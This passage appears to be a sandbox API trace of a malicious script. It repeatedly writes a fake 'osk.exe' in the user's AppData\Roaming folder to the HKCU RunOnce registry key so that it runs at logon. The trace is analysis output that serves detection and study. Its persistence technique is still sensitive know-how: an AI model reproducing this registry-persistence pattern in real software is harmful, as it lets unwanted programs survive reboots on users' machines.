uIDEvent=0x2083) returned 1 [0080.652] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.652] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.653] IUnknown:Release (This=0x787518) returned 0x1 [0080.653] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.653] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.653] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.654] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.654] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.654] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.654] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.654] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.654] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.654] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x8 [0080.654] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.654] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x9 [0080.654] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.655] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x8 [0080.655] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.655] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.655] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.655] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.655] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.655] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.656] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.656] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.656] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.656] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.656] RegCloseKey (hKey=0x280) returned 0x0 [0080.656] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.657] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.657] SetTimer (hWnd=0x20280, nIDEvent=0x2084, uElapse=0xa, lpTimerFunc=0x0) returned 0x2084 [0080.657] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.658] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.658] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.658] KillTimer (hWnd=0x20280, uIDEvent=0x2084) returned 1 [0080.658] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.658] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.658] IUnknown:Release (This=0x787518) returned 0x1 [0080.658] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.658] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.658] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.659] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.659] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.659] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.659] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.659] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.659] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.659] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x9 [0080.659] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.659] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xa [0080.659] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.660] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x9 [0080.660] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.660] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.660] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.660] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.660] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.660] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.660] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.660] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.661] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.661] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.661] RegCloseKey (hKey=0x280) returned 0x0 [0080.661] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.661] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.661] SetTimer (hWnd=0x20280, nIDEvent=0x2085, uElapse=0xa, lpTimerFunc=0x0) returned 0x2085 [0080.661] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.673] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.673] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.673] KillTimer (hWnd=0x20280, uIDEvent=0x2085) returned 1 [0080.673] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.673] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.674] IUnknown:Release (This=0x787518) returned 0x1 [0080.674] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.674] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.674] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x6a0, wReserved3=0x2b5, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.674] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.674] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.674] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.674] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.674] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.674] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.674] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xa [0080.674] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.674] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xb [0080.674] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.675] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0xa [0080.675] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.675] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.675] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.675] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.675] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.675] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.676] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.676] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.676] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.676] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.676] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.676] RegCloseKey (hKey=0x280) returned 0x0 [0080.676] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.676] 